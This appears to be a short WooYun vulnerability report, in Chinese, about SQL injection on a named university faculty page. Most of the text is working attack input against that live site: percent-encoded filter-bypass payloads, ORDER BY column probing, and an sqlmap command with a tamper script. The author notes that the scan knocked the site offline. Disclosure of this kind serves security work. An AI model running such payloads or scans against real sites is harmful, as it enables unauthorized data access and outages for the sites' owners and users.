WooYun.org

注入点：http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29

这样的话就被拦截了诶~ 怎么办呢！ ps：还好吾自幼师起丐帮帮主洪七公，因吾天资聪慧，筋骨强硬，便随洪七公习得打狗棍法。又因吾勤奋努力，朝闻鸡鸣而起，夕里挑灯练武，方可练到大成。
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=1

http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=111

http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2010
返回正常
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2011 返回错误
ok了啊
理论上来说
sqlmap -u http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 --random-agent --tamper=percentage --dbms access
就可以绕过了 但是 一跑软件，网站就死了 不跑的话，我没有猜到表段。

坑啊